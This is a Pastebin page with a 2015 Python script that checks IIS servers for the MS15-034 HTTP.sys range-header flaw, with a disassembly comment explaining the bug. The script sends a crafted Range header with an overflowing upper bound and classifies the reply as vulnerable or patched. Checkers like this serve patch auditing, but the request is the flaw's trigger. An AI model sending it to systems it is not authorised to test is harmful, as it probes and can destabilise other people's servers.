daily pastebin goal
71%
SHARE
TWEET

MS15-034 Checker

a guest Apr 14th, 2015 46,722 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. '''
  2. ___.                                   .___ __                         __  
  3. \_ |__   ____ ___.__. ____   ____    __| _//  |________ __ __  _______/  |_
  4. | __ \_/ __ <   |  |/  _ \ /    \ / __ |\  __\_  __ \ |  \/  ___/\  __\
  5. | \_\ \ ___/\___  (  <_> )   |  \/ /_/ | |  |  |  | \/  |  /\___ \ |  |  
  6. |___  /\___  > ____|\____/|___|  /\____ | |__|  |__|  |____//____  > |__|  
  7.     \/     \/\/                \/      \/                        \/        
  8.                                                            MS15-034 Checker
  9.  
  10. Danger! This script has not been properly qa'd and will probably fail in terrible ways.
  11. It is based off a change in HTTP!UlpParseRange in which an error code is returned as a
  12. result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of
  13. an HTTP range request.
  14. -BF
  15.  
  16.  
  17. 8a8b2112 56              push    esi
  18. 8a8b2113 6a00            push    0
  19. 8a8b2115 2bc7            sub     eax,edi
  20. 8a8b2117 6a01            push    1
  21. 8a8b2119 1bca            sbb     ecx,edx
  22. 8a8b211b 51              push    ecx
  23. 8a8b211c 50              push    eax
  24. 8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here
  25.  
  26. '''
  27. import socket
  28. import random
  29.  
  30. ipAddr = ""
  31. hexAllFfff = "18446744073709551615"
  32.  
  33. req1 = "GET / HTTP/1.0\r\n\r\n"
  34. req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
  35.  
  36. print "[*] Audit Started"
  37. client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  38. client_socket.connect((ipAddr, 80))
  39. client_socket.send(req1)
  40. boringResp = client_socket.recv(1024)
  41. if "Microsoft" not in boringResp:
  42.                 print "[*] Not IIS"
  43.                 exit(0)
  44. client_socket.close()
  45. client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  46. client_socket.connect((ipAddr, 80))
  47. client_socket.send(req)
  48. goodResp = client_socket.recv(1024)
  49. if "Requested Range Not Satisfiable" in goodResp:
  50.                 print "[!!] Looks VULN"
  51. elif " The request has an invalid header name" in goodResp:
  52.                 print "[*] Looks Patched"
  53. else:
  54.                 print "[*] Unexpected response, cannot discern patch status"
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top